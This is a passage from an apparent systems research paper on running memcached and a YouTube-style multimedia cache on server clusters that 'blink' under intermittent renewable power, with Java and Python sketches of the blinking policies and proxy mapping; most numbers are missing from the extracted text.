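    double getBatteryEnergy();
    double getChargeRate(int lastIntervalSec);
    double getDischargeRate(int lastIntervalSec);
    String getServerLoadStats(int nodeId);
}

public class SynchronousPolicyDriver {
    // give every node the same duty cycle so average usage tracks the available power
    static void applySynchronousPolicy(BlinkControl blink, int numNodes,
                                       double nodePeakWatts, int blinkIntervalSec) {
        // approximate available power as the charge rate over the last interval (an assumption)
        double availableWatts = blink.getChargeRate(blinkIntervalSec);
        double fraction = Math.min(1.0, availableWatts / (numNodes * nodePeakWatts));
        int onPercentage = (int) Math.round(fraction * 100);
        long now = System.currentTimeMillis();
        for (int node = 0; node < numNodes; node++) {
            blink.setBlinkInterval(node, blinkIntervalSec);
            blink.setDutyCycle(node, onPercentage);
            blink.syncActiveTime(node, now);   // start all active intervals together
        }
    }
}
```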
blinkcache: blinking memcached memcached is a distributed in-memory cache for storing key-value pairs that significantly reduces both the latency to access data objects and the load on persistent disk-backed storage. memcached has become a core component in internet services that store vast sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. amounts of user-generated content, with services maintaining dedicated clusters with s to , s of nodes (ousterhout et al., ). since end users interact with these services in real-time through web portals, low-latency access to data is critical. high page load latencies frustrate users and may cause them to stop generating new content (nah, ), which is undesirable since these services’ primary source of revenue derives from their content, e.g., by selling targeted ads. memcached overview memcached’s design uses a simple and scalable client-server architecture, where clients request a key value directly from a single candidate memcached server with the potential to store it. clients use a built-in mapping function to determine the ip address of this candidate server. initial versions of memcached determined the server using the function hash(key)%numservers, while the latest versions use the same consistent hashing approach popularized in dhts, such as chord (stoica et al., ). in either case, the key values randomly map to nodes without regard to their temporal locality, i.e., popularity. since all clients use the same mapping function, they need not communicate with other clients or servers to compute which server to check for a given key. likewise, memcached servers respond to client requests (gets and sets) without communicating with other clients or servers. this lack of inter-node communication enables memcached to scale to large clusters. importantly, clients maintain the state of the cache, including its consistency with persistent storage. as a result, applications are explicitly written to use memcached by (i) checking whether an object is resident in the cache before issuing any subsequent queries, (ii) inserting a newly referenced object into the cache if it is not already resident, and (iii) updating a cached object to reflect a corresponding update in persistent storage. each memcached server uses the least recently used (lru) replacement policy to evict objects. one common example of a cached object is an html fragment generated from the results of multiple queries to a relational database and other services. since a single http request for many internet services can result in over internal, and potentially sequential, requests to other services (decandia et al., ; ousterhout et al., ), the cache significantly decreases the latency to generate the html. access patterns and performance metrics the popularity of web sites has long been known to follow a zipf-like distribution (breslau et al., ; wolman et al., ), where the fraction of all requests for the ith most popular document is proportional to /iα for some constant α. previous studies (breslau et al., ; wolman et al., ) have shown that α is typically less than one for web site popularity. the key characteristic of a zipf-like distribution is its heavy tail, where a significant fraction of requests are for relatively unpopular objects. 
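the access pattern and the default key-to-server mapping described above can be reproduced with a short simulation: the sketch below draws keys from a zipf-like distribution (the fraction of requests for the ith most popular key proportional to 1/i^α) and maps each key to a server with the older hash(key) % numservers scheme; the parameter values are hypothetical.

```java
import java.util.Arrays;
import java.util.Random;

// illustrative only: zipf-like key requests mapped to memcached servers via hash % numServers.
public class ZipfWorkload {
    public static void main(String[] args) {
        int numKeys = 10_000, numServers = 4;
        double alpha = 0.8;                      // hypothetical, in the "less than one" range

        // precompute the cumulative zipf distribution: p(rank i) proportional to 1 / i^alpha
        double[] cdf = new double[numKeys + 1];
        for (int i = 1; i <= numKeys; i++) cdf[i] = cdf[i - 1] + 1.0 / Math.pow(i, alpha);
        for (int i = 1; i <= numKeys; i++) cdf[i] /= cdf[numKeys];

        int[] requestsPerServer = new int[numServers];
        Random rng = new Random(42);
        for (int r = 0; r < 100_000; r++) {
            // draw a popularity rank, then map its key to a server (older hash-mod scheme)
            double u = rng.nextDouble();
            int idx = Arrays.binarySearch(cdf, u);
            int rank = (idx >= 0) ? idx : -idx - 1;   // first index with cdf[index] >= u
            rank = Math.max(1, Math.min(numKeys, rank));
            String key = "object-" + rank;
            int server = Math.floorMod(key.hashCode(), numServers);
            requestsPerServer[server]++;
        }
        for (int s = 0; s < numServers; s++)
            System.out.println("server " + s + ": " + requestsPerServer[s] + " requests");
    }
}
```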
we expect the popularity of user-generated content for an internet service to be similar to the broader web, since, while some content may be highly popular, such as a celebrity’s facebook page, most users are primarily interested in either their own content or the content of close friends and associates. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the popularity rank, by number of fans, for all million public group pages on facebook follows a zipf-like distribution with α = . . as a test of our expectation, we rank all million user-generated fan pages on facebook by their number of fans. we use the size of each page’s fan base as a rough approximation of the popularity of its underlying data objects. figure confirms that the distribution is zipf-like with α approximately . . recent work also states that facebook must store a significant fraction of their data set in massive memcached clusters, i.e., on the order of , nodes, to achieve high hit rates, e.g., % of the entire data set to achieve a . % hit rate (ousterhout et al., ). this characteristic is common for zipf-like distributions with low α values, since many requests for unpopular objects are inside the heavy tail. thus, the distribution roughly divides objects into two categories: the few highly popular objects and the many relatively unpopular objects. as cache size increases, it stores a significant fraction of objects that are unpopular compared to the few popular objects, but nearly uniformly popular compared to each other. these mega-caches resemble a separate high-performance storage tier (ousterhout et al., ) for all data objects, rather than a small cache for only the most popular data objects. before discussing different design alternatives for blinkcache, we define our perfor- mance metrics. the primary cache performance metric is hit ratio, or hit rate, which represents the percentage of object requests that the cache services. a higher hit rate indicates both a lower average latency per request, as well as lower load on the back-end storage system. in addition to hit rate, we argue that fairness should be a secondary performance metric for large memcached clusters that store many objects of equal popularity. a fair cache distributes its benefits—low average request latency—equally across objects. caches are usually unfair, since their primary purpose is to achieve high hit rates by storing more popular data at the expense of less popular data. however, fairness increases in importance when there are many objects with a similar level of popularity, as in today’s large memcached clusters storing data that follows a zipf-like popularity sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. distribution. an unfair cache results in a wide disparity in the average access latency for these similarly popular objects, which ultimately translates to end-users receiving vastly different levels of performance. we use the standard deviation of average request latency per object as our measure of fairness. the lower the standard deviation the more fair the policy, since this indicates that objects have average latencies that are closer to the mean. blinkcache design alternatives we compare variants of three basic memcached policies for variable power constraints: an activation policy, a synchronous policy, and an asymmetric load-proportional policy. 
in all cases, any get request to an inactive server always registers as a cache miss, while any set request is deferred until the node becomes active. we defer a discussion of the implementation details using blink to the next section. • activation policy. an activation policy ranks servers ...n and always keeps the top m servers active, where m is the maximum number of active servers the current power level supports. we discuss multiple activation variants, including a static variant that does not change the set of available servers in each client’s built-in mapping function to reflect the current set of active servers, and a dynamic variant that does change the set. we also discuss a key migration variant that continuously ranks the popularity of objects and migrates them to servers ...n in rank order. • synchronous policy. a synchronous policy keeps all servers active for time t and inactive for time t − t for every interval t, where t is the maximum duration the current power level supports and t is short enough to respond to power changes but long enough to mitigate blink overhead. the policy does not change the set of available servers in each client’s built-in mapping function, since all servers are active every interval. • load-proportional policy. a load-proportional policy monitors the aggregate popularity of objects pi that each server i stores and keeps each server active for time ti and inactive for time t − ti for every interval t. the policy computes each ti by distributing the available power in the same proportion as the aggregate popularity pi of the servers. the load-proportional policy also migrates similarly popular objects to the same server. activation policy a straightforward approach to scaling memcached as power varies is to activate servers when power is plentiful and deactivate servers when power is scarce. one simple method for choosing which servers to activate is to rank them ...n and activate and deactivate them in order. since, by default, memcached maps key values randomly to servers, our policy for ranking servers and keys is random. in this case, a static policy variant that does not change each client’s built-in mapping function to reflect the active server set arbitrarily favors keys that happen to map to higher ranked servers, regardless of their popularity. as a result, requests for objects that map to the top-ranked server will see a significantly lower average latency than requests for objects that happen to map to the sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure to explicitly control the mapping of keys to servers, we interpose always-active request proxies between memcached clients and servers. the proxies are able to monitor per-key hit rates and migrate similarly popular objects to the same nodes. bottom-ranked server. one way to correct the problem is to dynamically change the built-in client mapping function to only reflect the current set of active servers. with constant power, dynamically changing the mapping function will result in a higher hit rate since the most popular objects naturally shift to the current set of active servers. to eliminate invalidation penalties and explicitly control the mapping of individual keys to servers we interpose an always-active proxy between memcached clients and servers to control the mapping (fig. ). 
in this design, clients issue requests to the proxy, which maintains a hash table that stores the current mapping of keys to servers, issues requests to the appropriate back-end server, and returns the result to the client. synchronous policy the migration-enabled activation policy, described above, approaches the optimal policy for maximizing the cache’s hit rate, since ranking servers and mapping objects to them according to popularity rank makes the distributed cache operate like a centralized cache that simply stores the most popular objects regardless of the cache’s size. we define optimal as the hit rate for a centralized cache of the same size as the distributed memcached instance under the same workload. however, the policy is unfair for servers that store similarly popular objects, since these servers should have equal rankings. the activation policy is forced to arbitrarily choose a subset of these equally ranked servers to deactivate. in this case, a synchronous policy is significantly more fair and results in nearly the same hit rate as the optimal activation policy. to see why, consider the simple -node memcached cluster in fig. with enough available power to currently activate half the cluster. there is enough power to support either (i) our activation policy with migration that keeps two nodes continuously active or (ii) a synchronous policy that keeps four nodes active half the time but synchronously blinks them between the active and inactive state. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure graphical depiction of a static/dynamic activation blinking policy (a), an activation blinking policy with key migration (b), and a synchronous blinking policy (c). for now we assume that all objects are equally popular, and compare the expected hit rate and standard deviation of average latency across objects for both policies, assuming a full cache can store all objects at full power on the nodes. for the activation policy, the hit rate is %, since it keeps two servers active and these servers store % of the objects. since all objects are equally popular, migration does not significantly change the results. in this case, the standard deviation is . ms, assuming an estimate of ms to access the cache and ms to regenerate the object from persistent storage. for a synchronous policy, the hit rate is also %, since all nodes are active half the time and these nodes store % of the objects. however, the synchronous policy has a standard deviation of ms, since all objects have a % hit probability, if the access occurs when a node is active, and a % miss probability, if the access occurs when a node is inactive. rather than half the objects having a ms average latency and half having a ms average latency, as with activation, a synchronous policy ensures an average latency of . ms across all objects. note that the synchronous policy is ideal for a normal memcached cluster with a mapping function that randomly maps keys to servers, since the aggregate popularity of objects on each server will always be roughly equal. further, unlike an activation policy that uses the dynamic mapping function, the synchronous policy does not incur invalidation penalties and is not arbitrarily unfair to keys on lower-ranked servers. load-proportional policy a synchronous policy has the same hit rate as an activation policy when keys have the same popularity, but is significantly more fair. 
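the comparison set up here can be worked through numerically: the sketch below estimates the standard deviation of per-object average latency for an activation policy versus a synchronous policy at half power, assuming equally popular objects; the latency constants and object count are hypothetical stand-ins, not the values used in the paper's example.

```java
// illustrative only: fairness (std. dev. of per-object average latency) for an activation
// policy vs. a synchronous policy at half power, assuming equally popular objects.
public class PolicyFairness {
    static final double HIT_MS = 1.0;    // hypothetical cache access latency
    static final double MISS_MS = 10.0;  // hypothetical latency to regenerate from storage

    // per-object average latency given the fraction of time its server is active
    static double avgLatency(double activeFraction) {
        return activeFraction * HIT_MS + (1 - activeFraction) * MISS_MS;
    }

    static double stdDev(double[] xs) {
        double mean = 0, var = 0;
        for (double x : xs) mean += x;
        mean /= xs.length;
        for (double x : xs) var += (x - mean) * (x - mean);
        return Math.sqrt(var / xs.length);
    }

    public static void main(String[] args) {
        int numObjects = 1000;
        // activation at half power: half the objects sit on always-on servers, half on off servers
        double[] activation = new double[numObjects];
        for (int i = 0; i < numObjects; i++)
            activation[i] = avgLatency(i < numObjects / 2 ? 1.0 : 0.0);
        // synchronous at half power: every object's server is active half the time
        double[] synchronous = new double[numObjects];
        for (int i = 0; i < numObjects; i++)
            synchronous[i] = avgLatency(0.5);

        // the expected hit rate is the same in both cases; only the fairness differs
        System.out.printf("activation : latency std dev = %.2f ms%n", stdDev(activation));
        System.out.printf("synchronous: latency std dev = %.2f ms%n", stdDev(synchronous));
    }
}
```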
however, an activation policy with migration is capable of a significantly higher hit rate for highly skewed popularity distributions. a proportional policy combines the advantages of both approaches for zipf-like distributions, where a few key values are highly popular but there is a heavy, but significant, tail of similarly unpopular key values. as with our activation policy, sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table summary of the best policy for a given performance metric and workload combination. metric workload best policy hit rate uniform synchronous hit rate zipf activation (migration) fairness uniform/zipf synchronous fairness + hit rate zipf load-proportional a proportional policy ranks servers and uses a proxy to monitor object popularity and migrate objects to servers in rank order. however, the policy distributes the available power to servers in the same proportion as the aggregate popularity of their keys. for example, assume that in our server cluster after key migration the percentage of total hits that go to the first server is %, the second server is %, the third server is %, and the fourth server is %. if there is currently w of available power then the first server ideally receives w, the second server w, the third server w, and the fourth server w. these power levels then translate directly to active durations over each interval t. in practice, if the first server’s maximum power is w, then it will be active the entire interval, since its maximum power is w. the extra w is distributed to the remaining servers proportionally. if all servers have a maximum power of w, the first server receives w, the second server receives w, i.e., % of the remaining w, the third server receives . w, and the fourth server receives . w. these power levels translate into the following active durations for a s blink interval: s, s, s, and s, respectively. the hit rate from a proportional policy is only slightly worse than the hit rate from the optimal activation policy. in this example, we expect the hit rate from an activation policy to be % of the maximum hit rate from a fully powered cluster, while we expect the hit rate from a proportional policy to be . %. however, the policy is more fair to the servers— %, %, and %—with similar popularities, since each server receives a similar total active duration. the zipf distribution for a large memcached cluster has similar attributes. a few servers store highly popular objects and will be active nearly % of the time, while a large majority of the servers will store equally unpopular objects and blink in proportion to their overall unpopularity. summary table provides a summary of the best policy for each performance metric and workload combination. in essence, an activation policy with key migration will always have the highest hit rate. however, for distributions with equally popular objects, the synchronous policy achieves a similar hit rate and is more fair. a load-proportional policy combines the best attributes of both for zipf-like distributions, which include a few popular objects but many similarly unpopular objects. we evaluate these design alternatives in ‘evaluation.’ greencache: blinking multimedia cache in the previous section we described how a stateless in-memory cache server can leverage the blinking abstraction to perform well on intermittent power. in this section, we study sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the characteristics of a distributed multimedia cache, which serves videos requested by clients, either by fetching them from the cache or retrieving them from backend servers. we assume the cache is write-through in that it stores cached videos on disk. a distributed multimedia cache is different than memcached in many ways—(a) it is not a key-value storage system and, unlike memcached, it streams data to multimedia players, (b) it stores data on persistent storage and its data size is often much larger than that of memcached, and (c) like any streaming server it can push data in advance to multimedia players to minimize buffering time and enhance viewers’ experience. in our analysis, we use traces of youtube traffic as our data source, since youtube is one of the most popular user-generated video content site and google deploys , s of servers to serve youtube requests made by users all around the world. multimedia cache overview multimedia caches are widely used to reduce backhaul bandwidth usage and improve viewers’ experience by reducing buffering time or access latency. apart from traditional multimedia servers, network operators have also started deploying multimedia caches at cellular towers to cater for the growing demand of multimedia content from smartphone users. traditionally, network operators have deployed caches only at centralized locations, such as operator peering points, in part, for both simplicity and ease of management (xu et al., ). however, researchers and startups have recently recognized the benefit of placing caches closer to edge (xu et al., ; stoke solutions, ). co-locating server caches closer to cell towers reduces both access latency, by eliminating the need to route requests for cached data through a distant peering point, and backhaul bandwidth usage from the cell tower to the peering point. caches co-located with cell towers primarily target multimedia data, since it consumes the largest fraction of bandwidth and is latency-sensitive. we study the design of greencache in the context of such a distributed multimedia cache for cellular towers. many of these cellular towers, especially in developing countries, are located in remote areas without reliable access to power. as a result, renewable energy sources have been proposed to power these cellular towers (guay, ; balshe, ). to handle intermittency in the power supply, we assume a cache architecture that comprises of a number of low-power servers, since a single large cache is not energy-proportional, and, thus, not well-suited to operating off intermittent renewable energy sources. the advantage of a distributed multimedia cache is that it allows the cache size to scale up and down based on available power. however, it introduces a new complication: if servers are inactive due to power shortages by renewables then the data cached on them becomes unavailable. if data resides on an inactive server, the client must either wait until the server is active, e.g., there is enough power, or retrieve the already cached data again from the origin server. in this case, the blinking abstraction enables the cache to provide service, albeit at degraded performance, during shortfall periods. in essence, blinking provides a cache with new options in its design space. rather than having a small cache composed of the sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 
figure the top part of the figure shows a potential streaming schedule for a blinking node while the bottom half shows the smooth play out with is achieved with the aid of a client-side buffer. number of always-on servers the available power can sustain, blinking provides the option of having a much larger cache composed of servers that are active for only a fraction of time each blink interval, e.g., active for s during each minute interval. the use of blinking raises new challenges in multimedia cache design. the main challenge is to ensure smooth uninterrupted video playback even while blinking. doing so implies that caches have to stream additional data during their active periods to compensate for lack of network streaming during sleep periods. further, end-clients will need to employ additional client-side buffers and might see higher startup latencies. since multimedia applications are very sensitive to fluctuation in network bandwidth that might cause delayed data delivery at the client, most applications prefer that video players employ a buffer to smooth out such fluctuations and provide an uninterrupted, error free play out of the data. this buffer, which already exists for most multimedia applications on the client side, integrates well into the blinking approach since it also allows the cache to bridge outage times in individual cache servers, as shown in fig. . a blinking cache will stream additional chunks when active, which are buffered at the client. as shown in this figure, the player is then able to play the video smoothly and masks interruptions from the viewer as long as it gets the next chunk of data before the previous chunk has finished playing. finally, in a typical cell tower or g/ g/wimax scenario the downstream bandwidth (∼ – mbps) is much less than the bandwidth a cache server can provide, which is sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. generally limited by its network card and disk i/o. so, the cache server can potentially reduce its energy consumption by sending data at its full capacity for a fraction of a time interval (usually few seconds) and going to a low-power state for the remaining period of the time interval, as shown in fig. . in essence, the server could employ the blinking abstraction to reduce its energy footprint while still satisfying the downstream bandwidth requirement of the cell tower or wimax station. moreover, blinking facilitates a cache to employ more servers than it can keep active with the available power, and thus provides an opportunity to reduce server load and bandwidth usage. the primary drawback of a blinking cache is that it stalls a request if the requested video is not currently available on an active server. if a client requests a video that is present on an inactive server, the cache can either get the video from the back-end server or the client pauses play out until the inactive server becomes active. while getting the video from the back-end server, instead of waiting for the inactive server to become active, reduces the buffering time, it increases the bandwidth cost. as we describe later in this section, greencache uses a low-power always-on proxy and staggered load-proportional blinking policy to reduce buffering time while sending requests to back-end servers only if data is not available in the cache. 
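to see how a modest client-side buffer can mask blinking, the sketch below checks whether a cache server can stream far enough ahead during its active period to cover its next inactive period, given a playback bitrate and a burst (network- or disk-limited) send rate; all rates and interval lengths are hypothetical.

```java
// illustrative only: can a blinking cache server stream far enough ahead during its
// active period to keep playback smooth through its next inactive period?
public class StreamAhead {
    public static void main(String[] args) {
        double playbackMbps = 2.0;          // hypothetical video bitrate
        double burstMbps = 100.0;           // hypothetical server send rate while active
        double tOnSec = 10, tOffSec = 50;   // hypothetical blink state

        // seconds of playback that must already be buffered to bridge the inactive period
        double neededSec = tOffSec;
        double neededMb = neededSec * playbackMbps;

        // data the server can push while active, beyond what is consumed during t_on
        double pushableMb = tOnSec * (burstMbps - playbackMbps);

        System.out.printf("client buffer needed: %.0f Mb (%.0f s of video)%n", neededMb, neededSec);
        System.out.printf("server can push ahead: %.0f Mb per active period -> %s%n",
                pushableMb, pushableMb >= neededMb ? "smooth playback" : "stalls likely");
    }
}
```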
youtube trace analysis to inform the design of greencache based on the characteristics of multimedia traffic and viewer behavior, we analyze a network trace that was obtained by monitoring youtube traffic entering and leaving a campus network at the university of connecticut. the network trace is collected with the aid of a monitoring device consisting of pc with a data acquisition and generation (dag) card (endace, ), which can capture ethernet frames. the device is located at a campus network gateway, which allows it to capture all traffic to and from the campus network. it was configured to capture a fixed length header of all http packets going to and coming from the youtube domain. the monitoring period for this trace was h. this trace contains a total of , requests for youtube videos out of which ∼ % of the video requests are single requests which leaves about % of the multiple requests to take advantage of caching of the requested videos. we would like to point out that a similar caching potential ( % in this case) has been reported in a more global study of g networks traffic analysis by erman et al. ( ). figure shows the popularity distribution of the most popular videos, which is obtained based on the user requests recorded in the trace. this figure only shows the most popular videos since the trace contains many videos with a very low popularity (< requests) and we wanted to depict the distribution of the most popular videos in more detail. the data obtained from the analysis of the trace shows that, despite the very long tail popularity distribution, caching can have an impact on the performance of such a video distribution system. in earlier work (khemmarart et al., ), we have shown that, not only caching but also the prefetching of prefixes of videos that are shown on the related video list of a youtube video page can improve the viewers experience of watching videos. further analysis of the sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure video popularity ( out of , ). trace revealed that , request out of the , had the tag related video (∼ %), which indicates that these videos have been chosen by viewers from the related video list that is shown on each youtube video’s web page. in addition to identifying videos that are selected from the related list, we also determine the position on the related list the video was selected from and show the result in fig. a. it shows that users tend to request from the top videos shown on the related list of a video, which accounts for % of the related video requests in the trace. this data shows that, prefetching the prefixes of the top videos shown on the related list of a currently watched video can significantly increase viewer’s experience, since the initial part can be streamed immediately from a location close to the client. based on these results, we decided to evaluate a blinking multimedia cache that performs both, traditional caching, and prefix prefetching for the top videos on the related video list. we also analyze the trace to investigate if viewers switch to a new video before they completely finish watching the current video. in order to analyze this behaviour, we look into the timestamps of a user requesting two consecutive videos. 
we calculate the difference of these timestamps and compare it with the total length of the first video requested to determine if the user has switched between videos before the previous video is completely viewed. figure b shows the number of occurrences (in percent out of the total number of videos watched) a video is watched for x% of its total length. this result shows that only in % of the cases videos are watched completely (also this number is similar to the global study performed by erman et al. ( )). in all other cases only part of the video is watched, with the majority of these cases (∼ %) falling in the – % viewing session length. this result let us to the decision to divide a video into equal-sized chunks, which allows for the storage of different chunks that belong to a single video on different nodes of the cache cluster. in ‘minimizing bandwidth cost,’ we describe how the chunk size is sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure youtube trace related videos and switch time analysis. (a) related video position analysis. (b) video switching time analysis. figure greencache architecture. determined and how chunking a video can reduce the uplink bandwidth usage if used on a blinking multimedia cache cluster. greencache design figure depicts greencache’s architecture, which consists of a proxy and several cache servers. the proxy maintains a video→chunk mapping and a chunk→node mapping, sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. while also controlling chunk server placement and eviction. clients, e.g., web browsers, connect to video servers through the proxy, which fetches the requisite data from one or more of its cache servers, if the data is resident in the cache. if the data is not resident, the proxy forwards the request to the host, i.e., backend server. the proxy stores metadata to access the cache in its own memory, while video chunks reside on stable storage on each cache server. similar to blinkcache, greencache also includes a power manager, that monitors available power and energy stored in a battery using hardware sensors, e.g., a voltage logger and current transducer. the power manager implements various blinking policies to control nodes’ active and inactive intervals to match the cache’s power usage to the available power. the power manager communicates with a power client running on each cache server to set the start time and active period every blink interval. the power client activates the node at the start time and deactivates the node after the active period every blink interval, and thus controls node-level power usage by transitioning the node between active and inactive states. as discussed earlier, the primary objective of a multimedia cache is to reduce buffering (or pause) time at clients and the bandwidth usage between the cache and origin servers. next, we describe greencache’s techniques to both reduce bandwidth usage to the backend origin servers, while also minimizing buffering (or pause) time at the client. minimizing bandwidth cost as fig. indicates, all videos are not equally popular. instead, a small number of videos exhibit a significantly higher popularity than others. similar to other multimedia caches, greencache has limited storage capacity, requiring it to evict older videos to cache new videos. 
an eviction strategy that minimizes the bandwidth usage each interval will evict the least popular videos during the next interval. however, such a strategy is only possible if the cache knows the popularity of each video in advance. to approximate a video's future popularity, greencache maintains each video's popularity as an exponentially-weighted moving average of a video's accesses, updated every blink interval. the cache then evicts the least popular videos if it requires space to store new videos.

as shown in fig. b, most videos are not watched completely most of the time. in fact, the figure shows that users of youtube watch less than % of the videos to completion. in addition, users might watch the last half of a popular video less often than the first half of an unpopular video. to account for discrepancies in the popularity of different segments of a video, greencache divides a video into multiple chunks, where each chunk's playtime is equal in length to the blink interval. similar to entire videos, greencache tracks chunk-level popularity as an exponentially weighted moving average of a chunk's accesses. formally, we can express the popularity of the ith chunk after the tth interval as:

popularity_i(t) = α · a_i(t) + (1 − α) · popularity_i(t − 1).    ( )

a_i(t) represents the total number of accesses of the ith chunk in the tth interval, and α is a configurable parameter that weights the impact of past accesses. further, greencache manages videos at the chunk level, and evicts the least popular chunks, from potentially different videos, to store a new chunk. as a result, greencache does not need to request chunks from the backend origin servers if the chunk is cached at one or more cache servers.

reducing buffering time
as discussed earlier, blinking increases buffering time by up to a blink interval if the requested chunk is not present on an active server. the proxy could mask the buffering time from a client if the client receives a chunk before it has finished playing the previous chunk. assuming sufficient energy and bandwidth, the proxy can get a cached chunk from a cache server within a blink interval, since all servers become active for a period during each blink interval. as a result, a user will not experience pauses or buffering while watching a video in sequence, since the proxy has enough time to send subsequent chunks (after the first chunk) either from the cache or the origin server before the previous chunk finishes playing, e.g., within a blink interval. however, the initial buffering time for the first chunk could be as long as an entire blink interval, since a request could arrive just after the cache server storing the first chunk becomes inactive. thus, to reduce the initial buffering time for a video, the proxy replicates the first chunk of cached videos on all cache servers. however, replication alone does not reduce the buffering time if all servers blink synchronously, i.e., become active at the same time every blink interval. as a result, as discussed next, greencache employs a staggered load-proportional blinking policy to maximize the probability of at least one cache server being active at any power level.

staggered load-proportional blinking
as discussed above, we replicate the first chunk of each cached video on all cache servers in order to reduce initial buffering time.
to minimize the overlap in node active intervals and maximize the probability of at least one active node at all power levels, greencache staggers start times of all nodes across each blink interval. thus, every blink interval, e.g., s, each server is active for a different period of time, as well as a different duration (discussed below). at any instant, a different set of servers (and their cached data) is available for clients. since at low power the proxy might not be able to buffer all subsequent chunks from blinking nodes, clients might face delays or buffering while watching videos (after initially starting them). to reduce the intermediate buffering for popular videos, greencache also groups popular chunks together and assigns more power to nodes storing popular chunks than nodes storing unpopular chunks. thus, nodes storing popular chunks are active for a longer duration each blink interval. greencache ranks all servers from ...n , with being the most popular and n being the least popular node. the proxy monitors chunk popularity and migrates chunks to servers in rank order. furthermore, the proxy distributes the available power to nodes in proportion to the aggregate popularity of their chunks. formally, the active period for the ith node, assuming negligible power for the inactive state, can be expressed as:

active_i = (b_i · p · popularity_i) / (mp · Σ(k=1..n) popularity_k).    ( )

b_i represents the length of a blink interval, popularity_i represents the aggregate popularity of all chunks mapped on the ith node, p denotes the available power, and mp is the maximum power required by an active node. additionally, start times of nodes are staggered in a way that minimizes the unavailability of first chunks, i.e., minimizes the period when none of the nodes are active, every blink interval. figure depicts an example of staggered load-proportional blinking for five nodes. note that since the staggered load-proportional policy assigns active intervals in proportion to servers' popularity, it does not create an unbalanced load on the cache servers.

prefetching recommended videos
most popular video sites display a recommended list of videos to users. for instance, youtube recommends a list of twenty videos which generally depends on the current video being watched, the user's location, and other factors including past viewing history. the trace analysis of youtube videos, as discussed above, indicates that users tend to select the next video from recommended videos ∼ % of the time. in addition, a user selects a video at the top more often than a video further down in the recommended list. in fact, fig. a shows that nearly % of the time a user selects the next video from the top five videos in the recommended list. to further reduce initial buffering time, the proxy prefetches the first chunk of the top five videos in the recommended list, if these chunks are not already present in the cache. the proxy fetches subsequent chunks of the video when the user requests the video next.

implementation
we use blink's hardware and software prototype from 'blink prototype' to experiment with blinkcache and greencache. we use the low-power server cluster of xo motherboards for blinkcache, and that of mac minis for greencache.

blinkcache implementation
we run an unmodified memcached server and an instance of blink's power client on each blinkcache node. we also wrote a memcached client workload generator to issue
we also wrote a memcached client workload generator to issue sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. key requests at a configurable but steady rate according to either a zipf popularity distribution, parameterized by α, or a uniform popularity distribution. as in a typical application, the workload generator fetches any data not resident in the cache from a mysql database and places it in the cache. since we assume the mysql server provides always-available persistent storage, it runs off the power grid and not variable power. we modify magent, a publicly available memcached proxy (http://code.google.com/ p/memagent/), to implement the design alternatives in the previous section, including table-based key mapping and popularity-based key migration. our modifications are not complex: we added or changed only lines of code to implement all of the blinkcache design variants from ‘blink prototype.’ since all requests pass through the proxy, it is able to monitor key popularity. the proxy controls blinking by interacting with blink’s power manager, which in our setup runs on the same node, to monitor the available power and battery level and set per-node blinking patterns. we also use the proxy for experiments with memcached’s default hash-based key mappings, rather than modifying the memcached client. since our always-on proxy is also subject to intermittent power constraints, we run it on a low-power ( w) embedded sheevaplug with a . ghz arm cpu and mb of memory. greencache implementation as discussed in ‘greencache: blinking multimedia cache,’ we study the greencache’s design in the context of a cellular tower powered by solar and wind energy. in our prototype we use a wimax base station to emulate the cellular tower. to analyze the blinking performance of greencache, we implement a greencache prototype in java, including a proxy (∼ , loc), cache server (∼ loc), power manager (∼ loc), and power client (∼ loc). mobile clients connect to the internet through a wireless base station, such as a cell tower or wimax base station, which is configured to route all multimedia requests to the proxy. while the power manager and proxy are functionally separate and communicate via well-defined apis, our prototype run both modules on the same node. our prototype does not require any modification in the base station or mobile clients. both cache server and power client run together on each blinking node. our prototype includes a full implementation of greencache, including the staggered load-proportional blinking policy, load-proportional chunk layout, prefetching, video chunking, chunk eviction and chunk migration. the proxy uses a java hashtable to map videos to chunks and their locations, e.g., via their ip address, and maintains their status, e.g., present or evicted. since our prototype has a modular implementation, we are able to experiment with other blinking policies and chunk layouts. we implement the activation and proportional policies similar to the memcached application as described in ‘blinkcache: blinking memcached’ and compare with greencache’s staggered load- proportional policy. we also implement a randomized chunk layout and the least recently used (lru) cache eviction policy to compare with the proposed load-proportional layout and popularity based eviction policy, respectively. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. 
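as a rough illustration of the table-based key mapping and popularity-based key migration added to the proxy (our own python sketch, not the actual magent changes, which modify c code), the proxy records per-key popularity and periodically re-packs keys so the hottest keys live on the most-active servers; because the mapping is an explicit table, changing the active server set does not remap, and therefore does not invalidate, existing keys.

```python
import hashlib

class TableBasedProxy:
    """explicit key -> server table with popularity-driven placement (illustrative only)."""

    def __init__(self, servers):
        self.servers = servers        # ranked list: index 0 = most-active server
        self.key_map = {}             # key -> server; the table survives active-set changes
        self.hits = {}                # key -> access count, a simple popularity proxy

    def server_for(self, key):
        if key not in self.key_map:   # first sighting: place by a hash of the key
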